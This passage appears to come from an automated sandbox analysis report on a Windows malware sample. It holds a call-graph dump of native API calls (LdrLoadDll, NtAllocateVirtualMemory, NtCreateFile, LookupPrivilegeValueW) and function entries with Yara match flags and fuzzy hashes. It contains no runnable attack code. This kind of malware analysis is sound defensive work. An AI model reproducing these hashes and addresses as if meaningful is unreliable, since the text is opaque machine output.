93395->93396 93397 41ac30 LdrLoadDll 93396->93397 93398 41ad9f 93397->93398 93399 41ac30 LdrLoadDll 93398->93399 93400 41ada8 93399->93400 93401 41ac30 LdrLoadDll 93400->93401 93402 41adb1 93401->93402 93403 41ac30 LdrLoadDll 93402->93403 93404 41adbd 93403->93404 93405 41ac30 LdrLoadDll 93404->93405 93406 41adc6 93405->93406 93407 41ac30 LdrLoadDll 93406->93407 93408 41adcf 93407->93408 93409 41ac30 LdrLoadDll 93408->93409 93410 41add8 93409->93410 93411 41ac30 LdrLoadDll 93410->93411 93412 41ade1 93411->93412 93413 41ac30 LdrLoadDll 93412->93413 93414 41adea 93413->93414 93415 41ac30 LdrLoadDll 93414->93415 93416 41adf6 93415->93416 93417 41ac30 LdrLoadDll 93416->93417 93418 41adff 93417->93418 93419 41ac30 LdrLoadDll 93418->93419 93420 41ae08 93419->93420 93421 41ac30 LdrLoadDll 93420->93421 93422 41ae11 93421->93422 93423 41ac30 LdrLoadDll 93422->93423 93424 41ae1a 93423->93424 93425 41ac30 LdrLoadDll 93424->93425 93426 41ae23 93425->93426 93427 41ac30 LdrLoadDll 93426->93427 93428 41ae2f 93427->93428 93429 41ac30 LdrLoadDll 93428->93429 93430 41ae38 93429->93430 93431 41ac30 LdrLoadDll 93430->93431 93432 41ae41 93431->93432 93433 41ac30 LdrLoadDll 93432->93433 93434 41ae4a 93433->93434 93435 41ac30 LdrLoadDll 93434->93435 93436 41ae53 93435->93436 93437 41ac30 LdrLoadDll 93436->93437 93438 41ae5c 93437->93438 93439 41ac30 LdrLoadDll 93438->93439 93440 41ae68 93439->93440 93441 41ac30 LdrLoadDll 93440->93441 93442 41ae71 93441->93442 93443 41ac30 LdrLoadDll 93442->93443 93444 41ae7a 93443->93444 93445 41ac30 LdrLoadDll 93444->93445 93446 41ae83 93445->93446 93447 41ac30 LdrLoadDll 93446->93447 93448 41ae8c 93447->93448 93449 41ac30 LdrLoadDll 93448->93449 93450 41ae95 93449->93450 93451 41ac30 LdrLoadDll 93450->93451 93452 41aea1 93451->93452 93453 41ac30 LdrLoadDll 93452->93453 93454 41aeaa 93453->93454 93455 41ac30 LdrLoadDll 93454->93455 93456 41aeb3 93455->93456 93457 41ac30 LdrLoadDll 93456->93457 93458 41aebc 93457->93458 93459 41ac30 LdrLoadDll 93458->93459 93460 41aec5 93459->93460 93461 41ac30 LdrLoadDll 93460->93461 93462 41aece 93461->93462 93463 41ac30 LdrLoadDll 93462->93463 93464 41aeda 93463->93464 93465 41ac30 LdrLoadDll 93464->93465 93466 41aee3 93465->93466 93467 41ac30 LdrLoadDll 93466->93467 93468 41aeec 93467->93468 93468->93246 93470 41af60 LdrLoadDll 93469->93470 93471 419edc 93470->93471 93501 12d2df0 LdrInitializeThunk 93471->93501 93472 419ef3 93472->93166 93474->93243 93476 41af60 LdrLoadDll 93475->93476 93477 41a55c NtAllocateVirtualMemory 93476->93477 93477->93347 93479 41cf40 93478->93479 93480 41cf46 93478->93480 93479->93352 93481 41bf90 2 API calls 93480->93481 93482 41cf6c 93481->93482 93482->93352 93484 41cfd0 93483->93484 93485 41bf90 2 API calls 93484->93485 93486 41d02d 93484->93486 93487 41d00a 93485->93487 93486->93360 93488 41bdc0 2 API calls 93487->93488 93488->93486 93489->93357 93490->93370 93491->93373 93492->93375 93493->93377 93494->93379 93496 41ac4b 93495->93496 93497 414e50 LdrLoadDll 93496->93497 93498 41ac6b 93497->93498 93499 414e50 LdrLoadDll 93498->93499 93500 41ad17 93498->93500 93499->93500 93500->93394 93500->93500 93501->93472 93503 12d2c1f LdrInitializeThunk 93502->93503 93504 12d2c11 93502->93504 93503->93252 93504->93252 93506 41a68c RtlFreeHeap 93505->93506 93507 41af60 LdrLoadDll 93505->93507 93506->93256 93507->93506 93509 407eb0 93508->93509 93510 407eab 93508->93510 93511 41bd40 2 API calls 93509->93511 93510->93174 93518 407ed5 93511->93518 93512 407f38 93512->93174 93513 419ec0 2 API calls 93513->93518 93514 407f3e 93515 407f64 93514->93515 93517 41a5c0 2 API calls 93514->93517 93515->93174 93519 407f55 93517->93519 93518->93512 93518->93513 93518->93514 93520 41bd40 2 API calls 93518->93520 93525 41a5c0 93518->93525 93519->93174 93520->93518 93522 408176 93521->93522 93523 41a5c0 2 API calls 93522->93523 93524 40817e 93523->93524 93524->93129 93526 41af60 LdrLoadDll 93525->93526 93527 41a5dc 93526->93527 93530 12d2c70 LdrInitializeThunk 93527->93530 93528 41a5f3 93528->93518 93530->93528 93532 41b5c3 93531->93532 93535 40acf0 93532->93535 93536 40ad14 93535->93536 93537 40ad50 LdrLoadDll 93536->93537 93538 409c4a 93536->93538 93537->93538 93538->93137 93540 40b063 93539->93540 93542 40b0e0 93540->93542 93554 419c90 LdrLoadDll 93540->93554 93542->93144 93544 41af60 LdrLoadDll 93543->93544 93545 40f1bb 93544->93545 93545->93152 93546 41a7d0 93545->93546 93547 41a7ef LookupPrivilegeValueW 93546->93547 93548 41af60 LdrLoadDll 93546->93548 93547->93149 93548->93547 93550 41af60 LdrLoadDll 93549->93550 93551 41a27c 93550->93551 93555 12d2ea0 LdrInitializeThunk 93551->93555 93552 41a29b 93552->93148 93554->93542 93555->93552 93557 40b1f0 93556->93557 93558 40b040 LdrLoadDll 93557->93558 93559 40b204 93558->93559 93559->93084 93561 40ae51 93560->93561 93562 40ae4d 93560->93562 93563 40ae6a 93561->93563 93564 40ae9c 93561->93564 93562->93086 93611 419cd0 LdrLoadDll 93563->93611 93612 419cd0 LdrLoadDll 93564->93612 93566 40aead 93566->93086 93568 40ae8c 93568->93086 93570 40f4a0 4 API calls 93569->93570 93571 4143c6 93569->93571 93570->93571 93571->93088 93613 4087a0 93572->93613 93575 4087a0 19 API calls 93576 408a8a 93575->93576 93578 408a9d 93576->93578 93633 40f710 11 API calls 93576->93633 93578->93090 93580 41af60 LdrLoadDll 93579->93580 93581 41a51c 93580->93581 93759 12d2e80 LdrInitializeThunk 93581->93759 93582 40c322 93584 40f4a0 93582->93584 93585 40f4bd 93584->93585 93760 419fc0 93585->93760 93588 40f505 93588->93094 93589 41a010 3 API calls 93590 40f52e 93589->93590 93590->93094 93592 41a02c 93591->93592 93593 41af60 LdrLoadDll 93591->93593 93767 12d2d10 LdrInitializeThunk 93592->93767 93593->93592 93594 41a05b 93594->93099 93595 41af60 LdrLoadDll 93594->93595 93596 41a07c 93595->93596 93768 12d2d30 LdrInitializeThunk 93596->93768 93597 41a08b 93597->93099 93601 41a066 93600->93601 93602 41af60 LdrLoadDll 93601->93602 93603 41a07c 93602->93603 93769 12d2d30 LdrInitializeThunk 93603->93769 93604 40c459 93604->93111 93607 41af60 LdrLoadDll 93606->93607 93608 419e3c 93607->93608 93770 12d2fb0 LdrInitializeThunk 93608->93770 93609 40c4ac 93609->93115 93611->93568 93612->93566 93614 4087b1 93613->93614 93615 407ea0 4 API calls 93614->93615 93616 4087ba 93615->93616 93617 408a3f 93616->93617 93619 408a49 93616->93619 93622 419f00 2 API calls 93616->93622 93625 41a490 LdrLoadDll NtClose 93616->93625 93628 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 93616->93628 93631 419e20 2 API calls 93616->93631 93634 419d10 93616->93634 93637 4085d0 93616->93637 93651 408120 93616->93651 93656 40f5f0 LdrLoadDll NtClose 93616->93656 93657 419d90 LdrLoadDll 93616->93657 93658 419dc0 LdrLoadDll 93616->93658 93659 419e50 LdrLoadDll 93616->93659 93660 4083a0 93616->93660 93676 405f60 LdrLoadDll 93616->93676 93618 408160 2 API calls 93617->93618 93618->93619 93619->93575 93619->93578 93622->93616 93625->93616 93628->93616 93631->93616 93633->93578 93635 41af60 LdrLoadDll 93634->93635 93636 419d2c 93635->93636 93636->93616 93638 4085e6 93637->93638 93677 419880 93638->93677 93640 4085ff 93641 408120 2 API calls 93640->93641 93647 408771 93640->93647 93642 40861f 93641->93642 93642->93647 93698 4081a0 93642->93698 93644 4086e5 93645 4083a0 12 API calls 93644->93645 93644->93647 93646 408713 93645->93646 93646->93647 93648 419f00 2 API calls 93646->93648 93647->93616 93649 408748 93648->93649 93649->93647 93650 41a500 2 API calls 93649->93650 93650->93647 93652 408153 93651->93652 93653 40812b 93651->93653 93652->93616 93653->93616 93653->93652 93654 41a5c0 2 API calls 93653->93654 93655 40817e 93654->93655 93655->93616 93656->93616 93657->93616 93658->93616 93659->93616 93661 4083c9 93660->93661 93738 408310 93661->93738 93664 41a500 2 API calls 93665 4083dc 93664->93665 93665->93664 93666 408467 93665->93666 93669 408462 93665->93669 93746 40f670 93665->93746 93666->93616 93667 41a490 2 API calls 93668 40849a 93667->93668 93668->93666 93670 419d10 LdrLoadDll 93668->93670 93669->93667 93671 4084ff 93670->93671 93671->93666 93750 419d50 93671->93750 93673 408563 93673->93666 93674 414a50 9 API calls 93673->93674 93675 4085b8 93674->93675 93675->93616 93676->93616 93678 41bf90 2 API calls 93677->93678 93679 419897 93678->93679 93705 409310 93679->93705 93681 4198b2 93682 4198f0 93681->93682 93683 4198d9 93681->93683 93686 41bd40 2 API calls 93682->93686 93684 41bdc0 2 API calls 93683->93684 93685 4198e6 93684->93685 93685->93640 93687 41992a 93686->93687 93688 41bd40 2 API calls 93687->93688 93689 419943 93688->93689 93695 419be4 93689->93695 93711 41bd80 93689->93711 93692 419bd0 93693 41bdc0 2 API calls 93692->93693 93694 419bda 93693->93694 93694->93640 93696 41bdc0 2 API calls 93695->93696 93697 419c39 93696->93697 93697->93640 93699 40829f 93698->93699 93700 4081b5 93698->93700 93699->93644 93700->93699 93701 414a50 9 API calls 93700->93701 93702 408222 93701->93702 93703 41bdc0 2 API calls 93702->93703 93704 408249 93702->93704 93703->93704 93704->93644 93706 409335 93705->93706 93707 40acf0 LdrLoadDll 93706->93707 93708 409368 93707->93708 93710 40938d 93708->93710 93714 40cf20 93708->93714 93710->93681 93732 41a580 93711->93732 93715 40cf4c 93714->93715 93716 41a1e0 LdrLoadDll 93715->93716 93717 40cf65 93716->93717 93718 40cf6c 93717->93718 93725 41a220 93717->93725 93718->93710 93722 40cfa7 93723 41a490 2 API calls 93722->93723 93724 40cfca 93723->93724 93724->93710 93726 41af60 LdrLoadDll 93725->93726 93727 41a23c 93726->93727 93731 12d2ca0 LdrInitializeThunk 93727->93731 93728 40cf8f 93728->93718 93730 41a810 LdrLoadDll 93728->93730 93730->93722 93731->93728 93733 41af60 LdrLoadDll 93732->93733 93734 41a59c 93733->93734 93737 12d2f90 LdrInitializeThunk 93734->93737 93735 419bc9 93735->93692 93735->93695 93737->93735 93739 408328 93738->93739 93740 40acf0 LdrLoadDll 93739->93740 93741 408343 93740->93741 93742 414e50 LdrLoadDll 93741->93742 93743 408353 93742->93743 93744 40835c PostThreadMessageW 93743->93744 93745 408370 93743->93745 93744->93745 93745->93665 93747 40f683 93746->93747 93753 419e90 93747->93753 93751 41af60 LdrLoadDll 93750->93751 93752 419d6c 93751->93752 93752->93673 93754 41af60 LdrLoadDll 93753->93754 93755 419eac 93754->93755 93758 12d2dd0 LdrInitializeThunk 93755->93758 93756 40f6ae 93756->93665 93758->93756 93759->93582 93761 419fd6 93760->93761 93762 41af60 LdrLoadDll 93761->93762 93763 419fdc 93762->93763 93766 12d2f30 LdrInitializeThunk 93763->93766 93764 40f4fe 93764->93588 93764->93589 93766->93764 93767->93594 93768->93597 93769->93604 93770->93609 93774 12d2ad0 LdrInitializeThunk

                                            Executed Functions

                                            Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                            Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 224 40acf0-40ad19 call 41cc50 227 40ad1b-40ad1e 224->227 228 40ad1f-40ad2d call 41d070 224->228 231 40ad3d-40ad4e call 41b4a0 228->231 232 40ad2f-40ad3a call 41d2f0 228->232 238 40ad50-40ad64 LdrLoadDll 231->238 239 40ad67-40ad6a 231->239 232->231 238->239
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                            Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 45filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 240 41a35a-41a35d 241 41a38c-41a3b1 NtCreateFile 240->241 242 41a35f 240->242 243 41a361-41a389 call 41af60 242->243 244 41a3b6-41a3bb 242->244 243->241
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: df073bc96a478ad95373646a6206053a0344060d6e364c2bcc6e0de6640884d7
                                            • Instruction ID: 69c37fb11e2f5eee866ddba396b0ccb0d923344698b40062e3b53735815f13d8
                                            • Opcode Fuzzy Hash: df073bc96a478ad95373646a6206053a0344060d6e364c2bcc6e0de6640884d7
                                            • Instruction Fuzzy Hash: 0101E8B6201108AFCB04DF89CC91EEB33A9EF8C754F158209FA1C97341DA34E8518BA5
                                            Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 248 41a360-41a376 249 41a37c-41a3b1 NtCreateFile 248->249 250 41a377 call 41af60 248->250 250->249
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 252 41a53a-41a556 253 41a55c-41a57d NtAllocateVirtualMemory 252->253 254 41a557 call 41af60 252->254 254->253
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 2d9f8a3505e228802d8c59eba0b7485e4d3d83cedfb6fe9d2e50aae9665707ea
                                            • Instruction ID: e042510b395ddda566e7e43e8d6fa4984aaa49d8af6ec77f50fa2295e50ab01e
                                            • Opcode Fuzzy Hash: 2d9f8a3505e228802d8c59eba0b7485e4d3d83cedfb6fe9d2e50aae9665707ea
                                            • Instruction Fuzzy Hash: 9BF0F8B2200218ABDB14DF89DC85EE777ADEF88754F158249FE0997241C630E811CBA4
                                            Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 255 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                            Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                            Function 012D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e2f06b1fc95efa57fe6b2999b9adb24a34c23daf4540c6a96cfd996ffd374ca4
                                            • Instruction ID: 2152f2b36151b63d83044326392cfcbe347094debb2555fcbb8737a6821d8568
                                            • Opcode Fuzzy Hash: e2f06b1fc95efa57fe6b2999b9adb24a34c23daf4540c6a96cfd996ffd374ca4
                                            • Instruction Fuzzy Hash: B990026121240003410571584418656404A97E0201B95C021E24145A0DC52589916225
                                            Function 012D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cd0a44772602fac3e62ed8dbb6ecdf46f731e8806e702ef163b5c48212e227fd
                                            • Instruction ID: 54c444e475ac1512e97bf3bca6e84b589bba5fc20b3423107526834dbc336310
                                            • Opcode Fuzzy Hash: cd0a44772602fac3e62ed8dbb6ecdf46f731e8806e702ef163b5c48212e227fd
                                            • Instruction Fuzzy Hash: AA90023121140802D1807158440868A004597D1301FD5C015A1425664DCA158B5977A1
                                            Function 012D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ff50f549a789e30d9c701643555a19fdb796d208374053e3a6e69de390a7cb3c
                                            • Instruction ID: 904889021aa289d1cd53ad7b7aba1aacb445f0c5371759b765b87f6b1400a9b6
                                            • Opcode Fuzzy Hash: ff50f549a789e30d9c701643555a19fdb796d208374053e3a6e69de390a7cb3c
                                            • Instruction Fuzzy Hash: 2E900225221400030105B5580708547008697D5351395C021F2415560CD62189615221
                                            Function 012D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d253299d320be2f706b463f9ffd2d250e25d4d04420356691affe56d6d886aa9
                                            • Instruction ID: 20b9444ca0a105aabe48e4b499d912d50205eb0904afc325470dae0b07b074fe
                                            • Opcode Fuzzy Hash: d253299d320be2f706b463f9ffd2d250e25d4d04420356691affe56d6d886aa9
                                            • Instruction Fuzzy Hash: 2690043131140003D140715C541C7474045F7F1301FD5D011F1C14574CDD15CD575333
                                            Function 012D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 91676181121b4d73cc021eee11a8e3d6427f900ac7f62d210be5e7f7ea208824
                                            • Instruction ID: f0ac06410b8912cd7df769b16a8f780e8d68a10206ae28af63836f1d6dc5a2da
                                            • Opcode Fuzzy Hash: 91676181121b4d73cc021eee11a8e3d6427f900ac7f62d210be5e7f7ea208824
                                            • Instruction Fuzzy Hash: 4890022922340002D1807158540C64A004597D1202FD5D415A1415568CC91589695321
                                            Function 012D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 96de625edcfd1caa9b08f087ff39d0bd3247c717cd786ecad1edf97f47448b3a
                                            • Instruction ID: 76fd6c7af6552006e516ca2a8d58551082850974d7772840a4dece7a67984853
                                            • Opcode Fuzzy Hash: 96de625edcfd1caa9b08f087ff39d0bd3247c717cd786ecad1edf97f47448b3a
                                            • Instruction Fuzzy Hash: FB90023121140413D11171584508747004997D0241FD5C412A1824568DD6568A52A221
                                            Function 012D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 86634568d6f16f6f776776b02552fb04d3cd3137bd684988d3d632ca08a89962
                                            • Instruction ID: 72c3d67168cf6d5ad17396c7c2e86a65070e2b6bd871cb1bdc40d7c7f65e7e2a
                                            • Opcode Fuzzy Hash: 86634568d6f16f6f776776b02552fb04d3cd3137bd684988d3d632ca08a89962
                                            • Instruction Fuzzy Hash: A6900221252441525545B15844085474046A7E02417D5C012A2814960CC5269956D721
                                            Function 012D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 72ac03bc8da569596a0e298529f21ed327a60886b45fd6040f2d4ffe5d49768c
                                            • Instruction ID: 9f1da61fdb85b1b17eb65bb797a6610cb4ed7c7fd46f0231109b2e0f0857fd88
                                            • Opcode Fuzzy Hash: 72ac03bc8da569596a0e298529f21ed327a60886b45fd6040f2d4ffe5d49768c
                                            • Instruction Fuzzy Hash: D290023121148802D1107158840878A004597D0301F99C411A5824668DC69589917221
                                            Function 012D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f09e0cd62de0c4ba344e1c7010c0965b657f07c4da1949b4aa681800eda54edd
                                            • Instruction ID: 7da10d00637b08173066ec9df47dfbe9cc4b81670c1fc7e1a8babd96b828c519
                                            • Opcode Fuzzy Hash: f09e0cd62de0c4ba344e1c7010c0965b657f07c4da1949b4aa681800eda54edd
                                            • Instruction Fuzzy Hash: AC90023121140402D1007598540C686004597E0301F95D011A6424565EC66589916231
                                            Function 012D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
